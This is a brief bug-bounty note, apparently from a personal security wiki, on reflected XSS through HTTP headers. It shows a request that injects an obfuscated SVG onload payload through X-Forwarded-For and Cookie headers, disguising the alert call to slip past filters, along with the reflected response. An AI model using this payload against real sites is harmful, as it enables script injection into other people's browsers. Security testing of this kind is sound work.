XSS Payload en cabecera

Finding xss into a hidden tricks 馃槈

finding xss into a hidden tricks 馃槈

GET /xxx/xx/xxx.xx/x.js?t=2021111121 HTTP/2
Host: example[.]com
X-Forwarded-For: xss
X-Forwarded-For: xss><svg/onload=globalThis[`al`+/ert/.source]`1`// X-Forwarded-For: >
Cookie: gdId=xss</script%20


result:
200 OK
...
guid="</script ","24.99.19.20","xss","xss><svg/onload=globalThis[`al`+/ert/.source]`1`//,">

PreviousBug BountyNextCKEditor 4

Last updated